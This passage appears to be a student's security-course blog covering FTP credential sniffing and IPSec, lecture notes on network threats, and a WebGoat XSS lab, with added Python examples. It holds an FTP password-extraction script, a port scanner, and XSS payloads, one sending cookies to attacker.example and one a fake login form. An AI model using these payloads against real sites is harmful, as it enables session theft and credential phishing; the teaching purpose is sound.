When the tides of life turn against you... And the current upsets your boat... Don't waste those tears on what might have been... Just lay on your back and float!...

Lab 6 ~Security in Network~

Assalamualaikum w.b.t..

In Lab 6 we learned Security in Network.. how to secure our network, more or less.. huhuhuhu... is that right? I guess so!... What you need to know:-
• Identify the vulnerabilities of FTP.
• Using Wireshark to capture FTP username and password.
• Explain what is IPSec.
• Enabling IPSec for securing FTP session.


Network Security and IPSec
A computer network is defined as a connection between two or more computers. Two computers are said to be interconnected if they are able to exchange information. Since its beginning, the network has become an essential tool for computer users. Computer users nowadays depend on networks; you cannot imagine the world without computer networking. At the beginning of their existence, computer networks were primarily used by university researchers for sending email and by corporate employees for sharing printers. Under these conditions security did not get a lot of attention. But nowadays, as millions of ordinary citizens are using networks for banking, shopping and sending sensitive information, network security is looming as a potentially massive problem.


Capturing File Transfer Protocol (FTP) Username and Password
Normally FTP and Telnet send their username and password in clear text. This is not secure, because an intruder can use a network monitoring tool such as Wireshark to sniff every packet transferred during the session, especially the ones carrying the username and password. The USER and PASS commands travel on the FTP control connection (TCP port 21); the file contents go over a separate data connection, which is just as unencrypted. It is therefore necessary to protect your username and password to prevent unauthorized activity.

1. Start the virtual machines containing winserv03_server and winserv03_client.
2. Log in as Administrator.
3. Set the IP addresses of winserv03_server and winserv03_client as below.

On winserv03_server
4. Check that winserv03_server already has the FTP server and Wireshark installed. If the FTP server is installed, start the FTP service via [Start] | [Administrative Tools] | [Internet Information Services (IIS)]; otherwise you need a Windows Server 2003 CD to install Internet Information Services (IIS) with the FTP service.


5. If Wireshark is not installed, it can be downloaded for free from http://www.wireshark.org.
6. If it is installed, open Wireshark on winserv03_server: [Start] | [Programs] | [Wireshark].

7. Click [Capture] | [Interfaces] to choose the network interface you want to monitor, refer to figure 6.4. Choose the network interface that has the IP address 192.168.1.106 and click [Start], refer to figure 6.X.


On winserv03_client
8. On the winserv03_client VM open a command prompt and log in to the FTP server on winserv03_server using the following command.

On winserv03_server
9. As you log in, view the Wireshark window on the winserv03_server VM: you will notice that the username and password you used to log in to the FTP server from the winserv03_client side are clearly visible. Capture the screen of your Wireshark output using the Print Screen button on your keyboard.
10. To reproduce this in a real environment you need two computers connected via a crossover cable.
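To see exactly what the sniffer recovers from step 9, here is an added example that is not part of the lab handout. It reassembles the client side of the FTP control connection from captured frames and pulls out the USER and PASS commands, which is what Wireshark's "Follow TCP Stream" shows you by hand. The frames are a constructed sample in the shape of this lab's traffic (192.168.1.106 is the server as in step 7; 192.168.1.107 as the client, the client port and the credentials are assumptions). The password is deliberately split across two TCP segments, which is why the parser reassembles the flow before matching instead of inspecting packets one at a time.

```python
import re
from collections import defaultdict

FTP_CONTROL_PORT = 21

# Constructed sample frames in capture order: (src_ip, dst_ip, dst_port, tcp_payload).
# 192.168.1.106 is the FTP server (as in the lab); 192.168.1.107 is the assumed client.
SAMPLE_FRAMES = [
    ("192.168.1.106", "192.168.1.107", 1045, b"220 Microsoft FTP Service\r\n"),
    ("192.168.1.107", "192.168.1.106", 21,   b"USER administrator\r\n"),
    ("192.168.1.106", "192.168.1.107", 1045, b"331 Password required for administrator.\r\n"),
    ("192.168.1.107", "192.168.1.106", 21,   b"PASS P@ss"),      # PASS split over
    ("192.168.1.107", "192.168.1.106", 21,   b"w0rd\r\n"),       # two segments
    ("192.168.1.106", "192.168.1.107", 1045, b"230 User administrator logged in.\r\n"),
    ("192.168.1.107", "192.168.1.106", 21,   b"QUIT\r\n"),
]

FTP_CRED_RE = re.compile(rb"^(USER|PASS)[ \t]+(.*)$", re.IGNORECASE)


def reassemble_client_streams(frames, port=FTP_CONTROL_PORT):
    """Concatenate, per (client, server) pair, every payload sent to the control port.

    This is the client-to-server half of what Wireshark's "Follow TCP Stream" shows.
    """
    streams = defaultdict(bytes)
    for src, dst, dst_port, payload in frames:
        if dst_port == port:
            streams[(src, dst)] += payload
    return streams


def extract_ftp_credentials(frames, port=FTP_CONTROL_PORT):
    """Return [(client_ip, server_ip, username, password), ...] found in the capture."""
    found = []
    for (client, server), data in reassemble_client_streams(frames, port).items():
        pending_user = None
        for line in data.split(b"\r\n"):          # FTP commands are CRLF-terminated lines
            match = FTP_CRED_RE.match(line)
            if not match:
                continue
            command = match.group(1).upper()
            argument = match.group(2).decode("latin-1")
            if command == b"USER":
                pending_user = argument            # remember until the PASS arrives
            elif command == b"PASS" and pending_user is not None:
                found.append((client, server, pending_user, argument))
                pending_user = None
    return found


def wireshark_display_filter():
    """Display filter that isolates the same two commands in the Wireshark GUI."""
    return 'ftp.request.command == "USER" || ftp.request.command == "PASS"'


if __name__ == "__main__":
    for client, server, user, password in extract_ftp_credentials(SAMPLE_FRAMES):
        print(f"{client} -> {server}: USER {user!r} PASS {password!r}")
```

Nothing here is decrypted or cracked: the credentials are simply read off the wire, which is the whole point of the lab. Typing the display filter returned by wireshark_display_filter() into the Wireshark filter bar shows the same two packets on the real capture.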




Using IPSec to secure FTP Transactions
IPSec is one of the solutions for safeguarding the transmission of data over FTP from being seen by unauthorized users. Even though IPSec is optional in IPv4, it is available and the user can choose to enable it. With a policy that requires security, IPSec encrypts the packets of an ordinary FTP connection (control and data channels alike) below the application, so only the authorized party can see the content and FTP itself needs no changes.
On winserv03_server
1. Click [Start] | [Run] and then type mmc.
2. The Management Console will appear; on the menu bar click [File] | [Add/Remove Snap-in].
3. On the Add/Remove Snap-in box, click the [Add] button, select [IP Security Monitor] and click [Add].
Figure below :

4. Repeat step 3 by selecting IP Security Policy Management, choose Local Computer, click [Finish] and then [Close].
5. On the Add/Remove Snap-in box, click [OK].
6. In the right pane, right-click [Secure Server (Require Security)] | [Properties].
7. In the Secure Server (Require Security) Properties dialog box, highlight All IP Traffic and click [Edit].
8. On the Edit Rule Properties dialog box, select the Authentication Methods tab. Click [Add] and the New Authentication Method Properties screen will appear. Select "Use this string (preshared key)", type MSPRESS in the text box, then click [OK]. Make sure the client's preshared key is the same as the server's preshared key. (A preshared key is the weakest of the three IPSec authentication methods, since the string is stored in clear text inside the policy; it is used here only because the lab VMs are not domain members and have no certificates.)
9. Highlight the Preshared Key entry and click the [Move up] button to make the preshared key the first priority for authentication.
10. Click [OK] on the Secure Server (Require Security) Properties dialog box and close it.
11. Right-click [Secure Server (Require Security)] and click [Assign] from the pop-up menu.
On winserv03_client
12. Click [Start] | [Run] and then type mmc.
13. The Management Console will appear; on the menu bar click [File] | [Add/Remove Snap-in].
14. On the Add/Remove Snap-in box, click the [Add] button, select [IP Security Monitor] and click [Add].
15. Repeat step 14 by selecting IP Security Policy Management, choose Local Computer, click [Finish] and then [Close].
16. On the Add/Remove Snap-in box, click [OK].
17. In the right pane, right-click [Client (Respond Only)] | [Properties].
18. In the Client (Respond Only) Properties dialog box, highlight the <Dynamic> (default response) rule and click [Edit].
19. On the Edit Rule Properties dialog box, select the [Authentication Methods] tab. Click [Add] and the New Authentication Method Properties screen will appear. Select "Use this string (preshared key)", type MSPRESS in the text box, then click [OK].
20. Highlight the Preshared Key entry and click the [Move up] button to make the preshared key the first priority for authentication. Click [Apply] | [OK].
21. Click [OK] on the Client (Respond Only) Properties dialog box and close it.
22. Right-click [Client (Respond Only)] and click [Assign]. Click [Apply] | [OK].
To check that it worked, repeat the FTP login from winserv03_client while capturing on winserv03_server: the USER and PASS lines are no longer readable, the capture shows ESP packets between the two addresses instead of FTP, and IP Security Monitor lists a security association between the two hosts.


Hmm.. in this lab I didn't manage to get it working on my PC.. there was some problem, I don't know what.. so I just watched a friend doing it on his PC... So far I understood a little bit... What I didn't understand I just went along with.. uhukksss...


alhamdulillahh...


"To the world you might be one person, but to one person you might be the world.."


Lecture 6 ~Security In Networks~

Assalamualaikum w.b.t..

In Lecture 6 we were taught about Security In Networks... Topics covered in this lecture:-
~Introduction to Network
~Who cause security problem
~Network security issues
~Network security controls


Overview Of Computer Networks
Definition
•A computing network is a computing environment with more than one independent processor
•May be multiple users per system
•Distance between computing systems is not considered (that is a communications media problem)
•Size of the computing systems is not relevant


Network Resources
•Computers
•Operating system
•Programs
•Processes
•People


Network Architecture



What Can a Network Provide?
~Logical interface functions
•Sending messages
•Receiving messages
•Executing programs
•Obtaining status information
•Obtaining status information on other network users


Basic Terminology
~Node
•Single computing system in a network.
~Host
•A single computing system's processor.
~Link
•A connection between two hosts.
~Topology
•The pattern of links in a network.


Types Of Network



Network Topology
Bus Topology
•Provides a single communication medium on which any node can place information and from which any node can retrieve information
•Attachments to the bus do not affect the other nodes on the bus



Star Topology
•Has a central switch
•All nodes wishing to communicate do so through the central host
•The central host receives all messages, identifies the addresses, selects the link appropriate for that address and forwards the messages



Ring Topology
•Connects a sequence of nodes in a loop or ring
•Can be implemented with minimum cabling
•A circulating token can control access to the loop, making it "synchronous"



Mesh Topology
•Each node can conceptually be connected directly to each other node
•Has integrity and routing advantages
•Not easily subject to destructive failures
•Routing logic can be used to select the most efficient route through multiple
nodes



ISO REFERENCE MODEL
~Open Systems Interconnection (OSI)
•Describes computer network communications.
•Developed by the International Organization for Standardization (ISO).
•Consists of seven layers.
•The model describes peer-to-peer correspondence, the relationship between corresponding layers of sender and receiver.
•Each layer represents a different activity performed in the actual transmission of a message.
•Each layer serves a separate function.
•Equivalent layers perform similar functions for sender and receiver.


Layer Responsible



Message Assembly In ISO Model



Networks As Systems
~Single System
•A single set of security policies is associated with each computing system.
•Each system is concerned with:
*integrity of data
*secrecy of data
*availability of service
•The operating system enforces its own security policies.


Advantages Of Computing Networks
~Resource sharing
•Reduces maintenance and storage costs.
~Increased reliability (i.e. availability of service)
•If one system fails users can shift to another.
~Distributing the workload
•Workload can be shifted from a heavily loaded system to an underutilized one.
~Expandability
•System is easily expanded by adding new nodes


Who Cause Security Problem
•Hacker
•Spy
•Student
•Businessman
•Ex-employee
•Stockbroker
•Terrorist
•etc


Network Security Problem Areas
~Authentication
•Deals with determining whom you are talking to before entering into a business deal or before revealing sensitive information
~Secrecy
•What usually comes to mind when people think about network security
~Non-repudiation
•Deals with proving who sent a message, typically by digital signature
~Integrity control
•Keeping information from being modified, added to or deleted by unauthorized users


Network Security Issues
~Disadvantages of computing networks
•Sharing
*Access controls designed for a single system may be inadequate once resources are shared across the network.
•Complexity
*A network may combine two or more systems with dissimilar operating systems and different mechanisms for interhost connection. Complexity of this nature makes the certification process extremely difficult.
•Unknown perimeter
*One host may be a node on two or more different networks.
•Many points of attack
*Access controls on one machine preserve the secrecy of data on that processor. However, a file stored on a remote network host may pass through many host machines on its way to the user.
•Unknown path
*There may be many paths from one host to another, and users generally have no control over how their messages are routed.
•Label format differences
*A problem which may occur in multilevel systems is that the access labels may have different formats, since there is no standard.
•Anonymity
*An attack can be passed through many other hosts in an effort to disguise where it originated
*The attacker works remotely, without any contact with the system administrator or users


Threats In Network
~Security Exposures
•Privacy
*With many unknown users on a network, concealing sensitive data becomes more difficult.
•Data Integrity
*Because more nodes and more users have potential access to a computing system, the risk of data corruption is higher.
•Authenticity
*It is difficult to assure the identity of a user on a remote system.
•Covert channels
*Networks offer more possibilities for constructing covert channels for data flow.
~Impersonation
•Countering it can involve the use of physical keys and biometric checks
•A cracker can configure a system to masquerade as another system, thus gaining unauthorized access to resources or information on systems that 'trust' the system being mimicked
~Eavesdropping
•Allows a cracker to make a complete transcript of network activity
•The cracker can obtain sensitive information such as passwords, data and procedures for performing functions.
•A cracker can eavesdrop:
*Using wiretapping
*By radio
*Via auxiliary ports on terminals
*Using software that monitors packets sent over the network (as Wireshark does in Lab 6)
~Denial of service
•A user can render the system unusable for legitimate users by 'hogging' a resource or by damaging or destroying resources
•Attacks may be caused deliberately or accidentally
•3 forms of network denial of service attack:
*Service overloading
*Message flooding
*Signal grounding
~Packet replay
•Refers to the recording and retransmission of message packets on the network
•An intruder could replay a legitimate authentication message sequence to gain access to a system
•Frequently undetectable unless the protocol includes freshness (nonces, timestamps or sequence numbers)
~Packet modification
•A significant integrity threat
•Involves a system intercepting and modifying a packet destined for another system


Networks Security Control
~Encryption
~Strong Authentication
~IPSec,VPN,SSH
~Kerberos
~Firewall
~Intrusion Detection System (IDS)
~Intrusion Prevention System (IPS)
~Honeypot


Encryption
~Link-to-link vs end-to-end
~Link-to-link
•Covers layers 1 and 2 of the OSI model
•Decryption occurs as the communication arrives at and enters each receiving computer along the path, so the data is in plaintext inside every intermediate host.
•If we have good physical security on those hosts, we may not be too concerned about this exposure.
~End-to-end
•Provides security from one end of a transmission to the other, at layer 6 or 7
•The encryption can be done by:
*A hardware device between the user and the host.
*Software running on the host computer.
•Protects the data at every intermediate node, since only the two endpoints hold the key


Strong Authentication
~In strong authentication, one entity ‘proves’ its identity to another by
demonstrating knowledge of a secret known to be associated with that entity,
without revealing that secret itself during the protocol.
~Also called ‘challenge-response’ authentication.
~Use cryptographic mechanisms to protect messages in protocol:
•Encryption.
•Integrity mechanism (e.g. MAC).
•Digital signature.
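The packet-replay threat above and the challenge-response idea in this section fit together, so here is one added example (my illustration, not part of the lecture slides) covering both: a server issues a fresh random challenge, the client answers with an HMAC over it using the shared secret, and the server accepts each challenge exactly once. Everything an eavesdropper could record (user name, nonce, response) is then replayed and rejected, and a second attempt without the secret fails as well. The shared secret, the user name "alice" and the message layout user || nonce are assumptions for the demo.

```python
import hashlib
import hmac
import os


def compute_response(shared_secret, user, nonce):
    """Client side: prove knowledge of the secret without sending it (HMAC-SHA256)."""
    return hmac.new(shared_secret, user.encode() + nonce, hashlib.sha256).digest()


class ChallengeResponseServer:
    """Server side: issues one-time challenges and verifies the responses."""

    def __init__(self, user_secrets):
        self.user_secrets = user_secrets   # user -> shared secret (assumed pre-provisioned)
        self.outstanding = {}              # user -> nonce issued but not yet answered

    def challenge(self, user):
        nonce = os.urandom(16)             # fresh, unpredictable, never reused
        self.outstanding[user] = nonce
        return nonce

    def verify(self, user, nonce, response):
        issued = self.outstanding.pop(user, None)   # one shot: consumed whether it passes or not
        if issued is None or not hmac.compare_digest(issued, nonce):
            return False                   # unknown, stale or already-used challenge
        secret = self.user_secrets.get(user)
        if secret is None:
            return False
        expected = compute_response(secret, user, nonce)
        return hmac.compare_digest(expected, response)   # constant-time comparison


def demo():
    """Run a legitimate login, then replay it, then try without the secret.

    Returns (legitimate_ok, replay_ok, wrong_secret_ok).
    """
    secret = b"correct horse battery staple"   # constructed shared secret
    server = ChallengeResponseServer({"alice": secret})

    # 1. Legitimate exchange; everything in 'wire' is what an eavesdropper sees.
    nonce = server.challenge("alice")
    wire = ("alice", nonce, compute_response(secret, "alice", nonce))
    legitimate_ok = server.verify(*wire)

    # 2. Packet replay: the attacker resends the recorded (nonce, response) pair.
    replay_ok = server.verify(*wire)

    # 3. Attacker obtains a fresh challenge but does not know the secret.
    nonce2 = server.challenge("alice")
    wrong_secret_ok = server.verify("alice", nonce2,
                                    compute_response(b"guess", "alice", nonce2))

    return legitimate_ok, replay_ok, wrong_secret_ok


if __name__ == "__main__":
    print(demo())
```

Compare this with the FTP login sniffed in Lab 6: there the secret itself (PASS) crosses the wire and can be reused forever; here the secret never leaves either end, and a recorded exchange is useless because its nonce has already been consumed.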


IPSec, SSH, SSL (application level security)
~IPSec
•Optional in IPv4
•Defines a standard means for handling encrypted data.
•Implemented at the IP layer, so it protects every layer above it, in particular TCP and UDP, without changing the applications.
•Provides authentication and integrity (AH) and encryption with optional authentication (ESP)
~SSH
•Secure remote login (encrypts the data sent over the network)
~SSL
•Secure Sockets Layer, encrypts data above the transport layer.
•SSL sits between applications (such as browsers) and the TCP/IP protocols to provide server authentication, optional client authentication, and an encrypted communications channel between client and server.


Kerberos
~Supports authentication in distributed systems.
~Kerberos is based on the idea that a central server provides authentication tokens, called tickets, to requesting applications.
•A ticket is an unforgeable, nonreplayable, authenticated object.
•It is an encrypted data structure naming a user and a service that the user is allowed to obtain.
•It also contains a time value and some control information.



Firewall
•What is a firewall?
•A Firewall is a network security device designed to restrict access to resources
(information or services) according to a security policy.
•Firewalls are not a “magic solution” to network security problems, nor are they a
complete solution for remote attacks or unauthorised access to data
•A Firewall is a network security device
•It serves to connect two parts of a network and control the traffic (data) which
is allowed to flow between them
•Often installed between an entire organisation's network and the Internet
•Can also protect smaller departments
•A Firewall is always the single path of communication between protected and
unprotected networks
•A Firewall can only filter traffic which passes through it
•If traffic can get to a network by other means, the Firewall cannot block it


Intrusion Detection System
~A device, software tool or hardware tool that monitors activity to identify malicious or suspicious events
~Used to detect unauthorized access to a computer system or network
~IDS components
•Sensor
*generates security events
•Console
*to monitor events and alerts and control the sensors
•Central Engine
*records events logged by the sensors in a database and uses a system of rules to generate alerts from the security events received
~Types of IDS
•Signature based (matches traffic or logs against patterns of known attacks; misses anything new)
•Anomaly based (learns a baseline of normal behaviour and alerts on deviations; can catch novel attacks but produces more false positives)
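To make the two IDS types concrete, here is an added example (my code, not part of the lecture) that runs both over a constructed FTP server log. The signature rules match known-bad request patterns (directory traversal, SITE EXEC); the anomaly rule has no pattern at all and instead flags any source whose rate of failed logins exceeds a baseline. The log format (date, time, client IP, command, argument, status code), the addresses and the thresholds are all assumptions for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not a real capture): "date time client-ip command argument status"
SAMPLE_LOG = """\
2009-04-12 10:01:03 192.168.1.107 USER administrator 331
2009-04-12 10:01:05 192.168.1.107 PASS - 230
2009-04-12 10:01:09 192.168.1.107 RETR report.txt 226
2009-04-12 10:02:10 10.0.0.5 USER administrator 331
2009-04-12 10:02:11 10.0.0.5 PASS - 530
2009-04-12 10:02:12 10.0.0.5 PASS - 530
2009-04-12 10:02:13 10.0.0.5 PASS - 530
2009-04-12 10:02:14 10.0.0.5 PASS - 530
2009-04-12 10:02:15 10.0.0.5 PASS - 530
2009-04-12 10:02:16 10.0.0.5 PASS - 530
2009-04-12 10:03:00 10.0.0.5 RETR ../../boot.ini 550
2009-04-12 10:05:00 192.168.1.107 PASS - 530
"""

LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\d{3})$")

# Signature rules: known-bad patterns matched against "command argument".
SIGNATURES = [
    ("ftp-directory-traversal", re.compile(r"\.\./")),
    ("ftp-site-exec", re.compile(r"^SITE EXEC\b", re.IGNORECASE)),
]

FAILED_LOGIN_THRESHOLD = 5                     # anomaly: more than this many 530s ...
FAILED_LOGIN_WINDOW = timedelta(seconds=60)    # ... from one source inside this window


def parse_log(text):
    """Return [(timestamp, ip, command, argument, status), ...], skipping malformed lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, ip, cmd, arg, status = m.groups()
            events.append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), ip, cmd, arg, int(status)))
    return events


def signature_alerts(events):
    """Signature-based detection: one alert per event that matches a known pattern."""
    alerts = []
    for ts, ip, cmd, arg, status in events:
        text = f"{cmd} {arg}"
        for name, pattern in SIGNATURES:
            if pattern.search(text):
                alerts.append((name, ip, text))
    return alerts


def anomaly_alerts(events, threshold=FAILED_LOGIN_THRESHOLD, window=FAILED_LOGIN_WINDOW):
    """Anomaly-based detection: flag a source with too many failed logins in a sliding window."""
    failures = defaultdict(list)
    alerts = []
    alerted = set()
    for ts, ip, cmd, arg, status in events:
        if status != 530:                      # 530 = login failed
            continue
        times = failures[ip]
        times.append(ts)
        while times and ts - times[0] > window:    # drop failures that fell out of the window
            times.pop(0)
        if len(times) > threshold and ip not in alerted:
            alerts.append(("ftp-bruteforce", ip, f"{len(times)} failed logins within {window}"))
            alerted.add(ip)
    return alerts


def run_ids(text):
    events = parse_log(text)
    return signature_alerts(events) + anomaly_alerts(events)


if __name__ == "__main__":
    for alert in run_ids(SAMPLE_LOG):
        print(alert)
```

The single mistyped password from 192.168.1.107 stays below the threshold and raises nothing, while 10.0.0.5 trips the anomaly rule before its traversal attempt trips the signature rule; a real IDS differs mainly in scale and in where the events come from (sensor on the wire or on the host), not in this logic.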


Intrusion Prevention System
~network security device that monitors network and/or system activities for
malicious or unwanted behavior and can react, in real-time, to block or prevent
those activities
~Network-based IPS, for example, will operate in-line to monitor all network traffic
for malicious code or attacks
~When an attack is detected, it can drop the offending packets while still allowing
all other traffic to pass
~Intrusion prevention technology is considered by some to be an extension of
intrusion detection (IDS) technology
~In addition, most IPS solutions have the ability to look at (decode) layer 7
protocols like HTTP, FTP, and SMTP which provides greater awareness


Honeypot
~Decoy systems designed to lure a potential attacker away from critical systems
~Designed to
•Divert the attacker from critical systems
•Collect information on the attacker's activity
•Encourage the attacker to stay long enough for the administrator to notice
~Contains fabricated information that no normal user would use
~Simulated traffic that emulates a real network


Hacking And Prevention
~motivated by the thrill of access and status
•the hacking community is a strong meritocracy
•status is determined by level of competence
~benign intruders might be tolerable
•they do consume resources and may slow performance
•you can't know in advance whether an intruder is benign or malign
~IDS / IPS / VPNs can help counter them
~awareness led to the establishment of CERTs
•collect / disseminate vulnerability information / responses
~Hacker Behavior Example
1. select target using IP lookup tools
2. map network for accessible services
3. identify potentially vulnerable services
4. brute force (guess) passwords
5. install remote administration tool
6. wait for admin to log on and capture password
7. use password to access remainder of network


Criminal Enterprise
~organized groups of hackers are now a threat
•corporation / government / loosely affiliated gangs
•typically young
•often Eastern European or Russian hackers
~common target: credit cards on e-commerce servers; criminal hackers usually have specific targets
~once penetrated, act quickly and get out
~IDS / IPS help but are less effective
~sensitive data needs strong protection


Criminal Enterprise Behavior
1. act quickly and precisely to make their activities harder to detect
2. exploit perimeter via vulnerable ports
3. use trojan horses (hidden software) to leave back doors for re-entry
4. use sniffers to capture passwords
5. do not stick around until noticed
6. make few or no mistakes.


Inside Attacker
~among most difficult to detect and prevent
~employees have access & systems knowledge
~may be motivated by revenge / entitlement
•when employment terminated
•taking customer data when move to competitor
~IDS / IPS may help but also need:
•least privilege, monitor logs, strong authentication,
~termination process to block access & mirror data


Inside Behavior Example
1. create network accounts for themselves and their friends
2. access accounts and applications they wouldn't normally use for their daily jobs
3. e-mail former and prospective employers
4. conduct furtive instant-messaging chats
5. visit web sites that cater to disgruntled employees, such as f'dcompany.com
6. perform large downloads and file copying
7. access the network during off hours.


Hacking And Prevention
~Exploitation of machines / unauthorized use of machine and network resources
~Hacking involves 5 phases
•Reconnaissance
•Scanning
•Gaining access
•Maintaining access
•Covering tracks


Reconnaissance And Scanning
~Gaining general information on the target host
•Company background
•Number of machines
•Types of machines
•OS
•Domain name
•IP address
•Location


How To?
~Find out initial information
*Google,whois,Nslookup
~Find out address range
*ARIN
*Traceroute
~Find active machine
*Ping
~Find open port
*Port scanner
*Nmap
*War dialers
~Figure out OS
*Nmap
~Map Out Network
*VisualRoute
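The "find open ports" step is the one of these that is easy to show in code, so here is an added example (my code, not the lecture's, and far simpler than Nmap) of a TCP connect scan. It starts a constructed dummy service on a loopback port so the scan has a target, tries to complete the TCP handshake on each port in a range, and grabs whatever banner an open service sends first, which is also how the "figure out OS / service" step usually begins. The banner text and the port window are assumptions for the demo.

```python
import socket
import threading
from contextlib import closing


def start_dummy_service(host="127.0.0.1"):
    """Constructed target for the demo: one TCP listener on an OS-assigned port.

    It greets every connection with an FTP-style banner so the scanner has
    something to grab. Returns (listening_socket, port).
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(5)
    srv.settimeout(0.5)                # so the accept loop can notice when we close it
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            except OSError:            # listener closed: stop serving
                return
            with closing(conn):
                conn.sendall(b"220 dummy FTP service ready\r\n")

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def tcp_connect_scan(host, ports, timeout=0.5):
    """TCP connect() scan: a port is open if the three-way handshake completes.

    Returns {port: banner} for every open port; the banner is whatever the
    service sent first (empty if it stayed silent until the timeout).
    """
    open_ports = {}
    for port in ports:
        with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))   # closed -> ConnectionRefusedError, filtered -> timeout
            except OSError:
                continue
            try:
                banner = s.recv(256).decode("latin-1").strip()
            except OSError:
                banner = ""
            open_ports[port] = banner
    return open_ports


def demo():
    """Scan a small window of loopback ports around the dummy service."""
    srv, port = start_dummy_service()
    try:
        return port, tcp_connect_scan("127.0.0.1", range(port - 3, port + 4))
    finally:
        srv.close()


if __name__ == "__main__":
    target_port, result = demo()
    for p, banner in sorted(result.items()):
        tag = "  <- our dummy service" if p == target_port else ""
        print(f"{p}/tcp open  {banner!r}{tag}")
```

A connect scan completes the handshake, so every probe shows up in the target's logs with the scanner's real address; that is exactly the kind of event the IDS example earlier in this lecture would count, and why tools like Nmap offer half-open (SYN) scans that need raw sockets.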


Gaining And Maintaining Access
~The information gathered in the previous steps helps identify vulnerabilities
~Exploit vulnerabilities to gain access
*Unpatched systems are dangerous because the vulnerabilities have been published worldwide
*Milw0rm.com, www.securityfocus.com, insecure.org, etc.
*The vulnerability is used to install a backdoor that can be used for future attacks
~Tools are available online
*Backtrack, Metasploit, etc.


Covering Tracks
~Every activity is logged
~syslog, access logs, event logs


In this lecture the lecturer just went through everything, because he said we are already very used to studying this stuff.. hmm.. true enough.. but.. we just don't really remember it.. he said to just read it ourselves.. so just read...


alhamdulillah...



"Live your life in the manner that you would like your kids to live theirs.."


Lab 5 ~ Web Application Security ~

Assalamualaikum w.b.t...

In Lab 5 this time we learned Web Application Security... What we learned was how to do Web Application Hacking simulation using WebGoat and WebScarab. Among the objectives to be achieved:-
• Describe the flaw of web application and how it is exploited.
• Exploit web application vulnerabilities.
• List prevention method that can be taken to overcome web
application vulnerabilities

Web Application Security
A web application, or simply webapp, is an application that can be accessed using a web browser over a network, either the Internet or a Local Area Network. It is developed using browser-supported languages such as HTML and JavaScript together with server-side languages such as PHP and ASP. The output produced is then rendered by a common web browser. Web applications let users access an application or system anywhere and at any time, provided the user has a network connection and a web browser installed on the machine. This ease of use makes webapps popular among Internet users. Moreover, the ability to update and maintain web applications without distributing and installing software on potentially thousands of client computers contributes to their popularity. Nowadays webapps are used for accessing mail, online banking, online shopping, online reservations, wikis and many other functions.


WebGoat and WebScarab
WebGoat is a simulation toolkit used to demonstrate how the vulnerabilities of a poorly designed web application can be exploited. The web application in WebGoat is a deliberately insecure J2EE application, so that users can understand the security issues by applying their security knowledge to exploiting a real vulnerability in the WebGoat application. In every lesson scenario, WebGoat provides hints and code to further explain the lesson. WebGoat keeps track of the user's progress on every lesson they complete, so users can see their level of competence in solving every problem given in the lessons.
WebScarab is the intercepting proxy used alongside it: the browser is pointed at WebScarab, which lets you inspect and edit every request before it reaches WebGoat.


Web Application Hacking simulation using WebGoat and WebScarab
1. Copy WebGoat-OWASP_Standard-5.2.zip and extract it to the C:\ drive.
2. Open the C:\WebGoat-5.2 folder and run webgoat.bat to start the Apache Tomcat J2EE server.

3. Open an IE 6.0 or Firefox web browser and type http://localhost/WebGoat/attack

4. Log in as User Name: guest, Password: guest

5. Open webscarab-selfcontained-20070504-1631.jar
6. If WebScarab does not open, install the JDK (jdk-6u4-windows-i586-p.exe) on your computer.
7. Once WebScarab has started, you should see the interface as in the figure below

8. Next, configure the web browser's proxy setting so that it uses 127.0.0.1 (localhost) port 8008, the port WebScarab listens on.
9. Go to WebScarab, click on the Intercept tab and enable the "Intercept requests" checkbox but leave "Intercept responses" disabled. This turns on the intercept feature of WebScarab, so that it holds every request from the web browser for editing.

10. Close your previous web browser, open it again and type in http://localhost/WebGoat/attack.
11. WebScarab will intercept your request to visit the website by prompting an Edit Request window as depicted in the figure below. This window shows the request data that you are sending to the web server.

12. The text field indicated by the arrow contains the data you are sending to the web server, and it can be modified. (In some of the following tasks you will need to modify the content of this text field to solve the problem in the lesson.)
13. For this task do not change the text field value; just click the [Accept changes] button to view the WebGoat main page.
14. Each time you click a submit button or a link on the web page, the Edit Request window will appear again, so make sure you click the [Accept changes] button to have your request page displayed in the browser.



Getting started with WebGoat and WebScarab
1. click on [Start WebGoat]

2. Click on the Introduction | How to work with WebGoat menu.

3. Read and follow the instruction given in the WebGoat.



XSS attack
Task
1. This lesson will show you how XSS is used for a phishing attack.
2. Click on the Cross Site Scripting (XSS) | Phishing with XSS menu.
3. Apply the script below to the text field in order to create a false login page so that you can harvest the username and password keyed in by the user.


4. Once you hit the Search button you will see a comment page containing a place for you to log in. This login page is created by the JavaScript above.
5. Try logging in with any username and password; if this were a real phishing website you would not get the prompted message on your screen, but the values you supplied might be sent across the world to a server that gathers the login information.
6. Next click on the Cross Site Scripting (XSS) | Reflected XSS Attacks menu.
7. In this lesson some prevention mechanisms have been built into the script: some fields validate the characters you supply and will reject any tag symbol you use. However, some fields are still not protected. Using the script below, find which text field can be exploited by an XSS attack.
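Both XSS tasks come down to one question: does the page put your input back into its HTML as markup or as text? Here is an added example (my code, not WebGoat's) with three versions of a search page that echoes the query: one with no protection, one with the kind of partial blocklist the reflected-XSS lesson hints at (it strips <script> tags only), and one that HTML-encodes the output. The payloads are constructed for the demo (the attacker host attacker.example and the form fields are assumptions); the fake-login-form payload shows why the phishing variant needs no script tag at all.

```python
import html
import re

# Minimal model of the WebGoat search page: the server echoes the query back into HTML.
PAGE_TEMPLATE = "<h2>Results for: {query}</h2>\n<p>No weather stations matched.</p>"

# Constructed attacker inputs for the demo (not the lab's own script).
SCRIPT_PAYLOAD = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"
CASE_PAYLOAD = "<ScRiPt>alert(1)</ScRiPt>"
EVENT_HANDLER_PAYLOAD = "<img src=x onerror=\"alert('xss')\">"
# The phishing variant: no script at all, just a fake login form posting to the attacker.
FORM_PAYLOAD = ("<form action='http://attacker.example/login'>User:<input name=u>"
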